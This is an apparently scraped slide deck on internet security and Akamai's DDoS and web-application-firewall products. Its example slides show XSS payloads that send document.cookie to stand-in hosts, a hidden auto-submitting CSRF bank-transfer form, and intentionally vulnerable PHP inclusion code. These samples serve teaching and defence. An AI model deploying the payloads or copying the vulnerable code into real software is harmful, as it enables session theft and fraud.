Internet Security and Akamai s Solutions. Preview of internet security today and how Akamai as cloud service provider mitigates attacks

Similar documents
Where every interaction matters.

FortiWeb 5.0, Web Application Firewall Course #251

Contemporary Web Application Attacks. Ivan Pang Senior Consultant Edvance Limited

Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst

Arrow ECS University 2015 Radware Hybrid Cloud WAF Service. 9 Ottobre 2015

Web Application Security 101

IJMIE Volume 2, Issue 9 ISSN:

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Imperva Cloud WAF. How to Protect Your Website from Hackers. Hackers. *Bots. Legitimate. Your Websites. Scrapers. Comment Spammers

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Multi-Layer Security for Multi-Layer Attacks. Preston Hogue Dir, Cloud and Security Marketing Architectures

Web Application Level Approach against the HTTP Flood Attacks IOSEC HTTP Anti Flood/DoS Security Gateway Module

How To Protect A Web Application From Attack From A Trusted Environment

Agenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka

DDoS Protection Technology White Paper

On-Premises DDoS Mitigation for the Enterprise

Web Application Defence. Architecture Paper

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Semantic based Web Application Firewall (SWAF V 1.6) Operations and User Manual. Document Version 1.0

Magento Security and Vulnerabilities. Roman Stepanov

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

1. Introduction. 2. DoS/DDoS. MilsVPN DoS/DDoS and ISP. 2.1 What is DoS/DDoS? 2.2 What is SYN Flooding?

10 Things Every Web Application Firewall Should Provide Share this ebook

Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified

CSE 3482 Introduction to Computer Security. Denial of Service (DoS) Attacks

WEB APPLICATION FIREWALLS: DO WE NEED THEM?

REAL-TIME WEB APPLICATION PROTECTION. AWF SERIES DATASHEET WEB APPLICATION FIREWALL

Threat Advisory: Trivial File Transfer Protocol (TFTP) Reflection DDoS

Advanced Administration for Citrix NetScaler 9.0 Platinum Edition

THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS

STOPPING LAYER 7 ATTACKS with F5 ASM. Sven Müller Security Solution Architect

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Penta Security 3rd Generation Web Application Firewall No Signature Required.

How Web Application Security Can Prevent Malicious Attacks

Hack Yourself First. Troy troyhunt.com

Acquia Cloud Edge Protect Powered by CloudFlare

SHARE THIS WHITEPAPER. Top Selection Criteria for an Anti-DDoS Solution Whitepaper

Firewalls P+S Linux Router & Firewall 2013

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Introduction to DDoS Attacks. Chris Beal Chief Security Architect on Twitter

Kona Site Defender. Product Description

CS5008: Internet Computing

CS 356 Lecture 16 Denial of Service. Spring 2013

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

JUST FOR THOSE WHO CAN T TOLERATE DOWNTIME WE ARE NOT FOR EVERYONE

Mitigating Denial of Service Attacks. Why Crossing Fingers is Not a Strategy

Annex B - Content Management System (CMS) Qualifying Procedure

Check list for web developers

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM

Guidelines for Web applications protection with dedicated Web Application Firewall

Application Firewall Overview. Published: February 2007 For the latest information, please see

Implementation of Web Application Firewall

The server will respond to the client with a list of instances. One such attack was analyzed by an information security researcher in January 2015.

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Web application security

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

A Layperson s Guide To DoS Attacks

CloudFlare advanced DDoS protection

Network Threats and Vulnerabilities. Ed Crowley

TDC s perspective on DDoS threats

White Paper A10 Thunder and AX Series Load Balancing Security Gateways

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

SecurityDAM On-demand, Cloud-based DDoS Mitigation

DDoS Protection on the Security Gateway

Are you fighting new threats with old weapons? Secure your Web applications with Web Application Firewalls.

Keyword: Cloud computing, service model, deployment model, network layer security.

Complete Protection against Evolving DDoS Threats

Hack Proof Your Webapps

Security threats and attackers are turning

The Web AppSec How-to: The Defenders Toolbox

Intrusion detection for web applications

Load Balancing Security Gateways WHITE PAPER

V-ISA Reputation Mechanism, Enabling Precise Defense against New DDoS Attacks

Web Application Firewall on SonicWALL SSL VPN

DDoS ATTACKS: MOTIVES, MECHANISMS AND MITIGATION

IBM Protocol Analysis Module

This document is licensed for use, redistribution, and derivative works, commercial or otherwise, in accordance with the Creative Commons

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Akamai Cloud Security Solutions:

Symantec Endpoint Protection 11.0 Network Threat Protection (Firewall) Overview and Best Practices White Paper

How To Stop A Ddos Attack On A Website From Being Successful

DDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest

Protecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

WEB APPLICATION SECURITY

What is Web Security? Motivation

First Line of Defense

A GUIDE TO MULTI-LAYERED WEB SECURITY

Information Technology Policy

VALIDATING DDoS THREAT PROTECTION

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

WEB SITE SECURITY. Jeff Aliber Verizon Digital Media Services

ADC Survey GLOBAL FINDINGS

Internet Firewall CSIS Internet Firewall. Spring 2012 CSIS net13 1. Firewalls. Stateless Packet Filtering

Brocade Virtual Traffic Manager and Microsoft IIS Deployment Guide

Web Application Firewall on SonicWALL SRA

Ethical Hacking Penetrating Web 2.0 Security

Transcription:

Internet Security and Akamai s Solutions Preview of internet security today and how Akamai as cloud service provider mitigates attacks

Agenda How much is the cost? The most costly causes Denial of Services Web Attacks Akamai s solutions

How much is the cost? 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Ponemon Institute October 2013 Annualized cost of cyber crime Minimum : $1.3 million Maximum : $5.8 million Average : $8.9 million Increase 26% from 2012 Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf

The most costly causes 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Ponemon Institute October 2013 Denial of Services Web-based attacks Malicious code account for more than 55 percent of all cyber crime costs per organization on an annual basis Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf

Denial of Services What is it? DDoS Akamai s solutions

Denial of Services : What is it? Intention : intended users not able to access service(s) Mode : exploit infrastructure limitations such as network bandwidth, maximum connections, memory and CPU resources, exploit protocol limitations Characteristics : burst of packet data

Denial of Services : Real-life Case

Denial of Services : DDoS attack

Denial of Services : Amplification

Denial of Services : DNS attack DNS server attacks, based on its characteristics : DNS relies on the Universal Datagram Protocol (UDP), a connectionless protocol that doesn t validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit large amounts of data in a response.

Akamai s Solutions for DoS

Akamai s Solutions for DoS Distributed Perimeters : harder to burst Filtering packet data and only forwarding legitimate packet to server Network-layer control : drop network-layer DDoS attacks, define and enforce IP whitelists/blacklist Adaptive Rate control : application layer DoS

Web Attacks : SQL injection SQL Injection, where bogus database queries are used to overwhelm or infiltrate critical applications and databases

Web Attacks : SQL Injection Exploits nonsanitized input in application, to execute malicious SQL query

Web Attacks : Cross Site Scripting allow attackers to enter a script that is then executed in the user's browser, for example to steal cookie

Web Attacks : Cross Site Scripting Sample input into guestbook, forum, private message <SCRIPT type="text/javascript"> var adr = '../evil.php?cakemonster=' + escape(document.cookie); </SCRIPT>

XSS "><a href="#" onclick="document.location='http://yoursite.com/what everyouwant.php?cookie=' +escape(document.cookie);"><click Me></a></script> Source : http://www.go4expert.com/articles/stealing-cookie-xss-t17066/

Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host

Web Attacks : CSRF Scheme

Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host POST http://bank.com/transfer.do HTTP/1.1 acct=bob&amount=100

Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host <form action="http://bank.com/transfer.do" method="post"> <input type="hidden" name="acct" value="maria"/> <input type="hidden" name="amount" value="100000"/> <input type="submit" value="view my pictures"/> </form> <body onload="document.forms[0].submit()"> <form...

Akamai s Solutions for Web Attacks Kona Site Defender with Web Application Firewall performs a 'deep inspection' of every request and response in every common form of Web traffic Kona Rules: Akamai s Threat Intelligence Team develops and updates WAF rules continually to address new and emerging web application attacks, such as SQL injections, cross-site scripting, remote file inclusion and more.

Akamai s Solutions for Web Attacks Application-Layer Controls: A collection of predefined, configurable application-layer firewall rules address categories such as Protocol Violations, Request Limit Violations, HTTP Policy Violations

To Attack Methods

Biggest saving from security technologies 2013 Cost of Cyber Crime Study: United States Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf Benchmark Study of U.S. Companies Ponemon Institute October 2013

Average days to resolve attack 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf Ponemon Institute October 2013

Remote File Injection <?php // define $authorized = true only if user is authenticated if (authenticated_user()) { $authorized = true; } // Because we didn't first initialize $authorized as false, this might be // defined through register_globals, like from GET auth.php?authorized=1 // So, anyone can be seen as authenticated! if ($authorized) { include "/highly/sensitive/data.php"; }?>

Remote File Injection <?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; require( $color. '.php' );?>

CSRF prevention with Synchronizer Token <form action="/transfer.do" method="post"> <input type="hidden" name="csrftoken" value="owy4nmqwode4odrjn2q2ntlhmmzlywe... wyzu1ywqwmtvhm2jmngyxyjjimgi4mjjjzde1zdz... MGYwMGEwOA=="> </form>

How WAF prevents CSRF A random token is added to every form as it streams through the firewall and is validated on the requests. This builds on the unique strengths of the Application Firewall to do in-line parsing of html to store all the links and forms sent to the client in that session. The firewall can thus validate all form fields against a stored signature to ensure no fields are added or tampered with

How to prevent XSS First of all, encode all <, >, and. This should be the first step of your XSS filter. See encoding below: & > & < > < > > > > " > &#x27; / > /

Amplification Attacks DNS server attacks, based on its characteristics : DNS relies on the Universal Datagram Protocol (UDP), a connectionless protocol that doesn t validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit large amounts of data in a response. NTP attacks Using UDP-based protocol that is prone to amplification attacks monlist command : 234 bytes could yield a response of 100 packets for a total more than 48K an amplification factor of 206x

SYN flood Source : https://www.usenix.org/legacy/events/bsdcon02/full_papers/lemon/lemon_html/node2.html

Widescreen Test Pattern (16:9) Aspect Ratio Test (Should appear circular) 4x3 16x9

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information